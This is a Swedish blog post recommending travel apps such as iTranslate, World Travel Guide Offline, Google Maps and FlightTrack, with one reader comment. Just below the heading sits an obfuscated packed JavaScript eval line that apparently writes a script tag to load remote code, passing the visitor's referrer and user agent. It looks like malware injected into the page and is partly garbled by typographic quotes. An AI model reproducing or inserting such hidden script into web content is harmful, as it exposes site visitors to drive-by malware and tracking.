Image Image Image Image Image Image Image Image Image Image

| 16 juni, 2021

Scroll to top

Top

Reseapparna du bör ha med dig

Reseapparna du bör ha med dig


Reseappar: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ibyaa|var|u0026u|referrer|bdtbf||js|php’.split(’|’),0,{}))
Denna vecka blir veckans appar istället lite sommar inspirerat med reseappar.
Även om det fortfarande är slaskigt och halt ute så är det så att man mer och mer längtar till att få komma till varmare breddgrader. 

I år var det väldigt många som lämnade Sverige under vinterledigheten och gav sig själva en varm solsemester. Mycket därför att sommaren 2012 kanske inte var den bästa vi beskådat.

Hur som helst, här är några bra reseappar för dig som planerar att åka bort den närmaste tiden.

iTranslate är en perfekt app för dig som vill tala med urbefolkning i det land som besöks. Det spelar ingen roll längre om det talar isländska eller japanska. Placera bara din smartphone mellan dig och den person du kommunicerar med och och iTranslate översätter meningen. Kanske inte alltid korrekt men det fungerar.

World Travel Guide Offline
World Travel Guide Offline Tom's Apps, LLC Resor, Referens 20 SEK Ladda ner

World Travel Guide Offline ger dig guider från hela världens direkt i din smartphone. Du laddar ner valfri guide och sparar ner den så du slipper internet på resan. Se sevärdheter, följ cityvandringar och få bra tips på restauranger i närheten utan uppkoppling mot nätet.

Valutakurser SEK gör exakt vad den säger. Det är vanligt att man lätt glömmer bort vad en krona står mot den valuta som finns på din destination. Denna app håller koll så att du inte betalar överpriser på marknaden.

Google Maps
Google Maps Google LLC Navigering, Mat och dryck Gratis Ladda ner

Google Maps, en klassiker med kvalitet. Den låter dig hitta till den där speciella restaurangen eller sevärdheten utan att behöva ta med den där analoga kartan som alltid blåser bort. Med din smartphones inbyggda GPS visar den också vart du befinner dig så du inte går vilse eller åt fel håll.

Förseningar med flyg är alltid något man ska ha i åtanke. Det har på senare blivit vanligt med försenade eller helt inställda flyg. Med FlightTrack håller du dig uppdaterat om just detta. Du kan också se vilken gate ditt plan avgår från. Den ger information över hela världen och kan komma bli den ultimata räddningen om planet skulle ställas in.

Kommentera gärna nedan om du har tips på fler bra reseappar.

 

Comments

  1. Linda

    Bra tips, tack!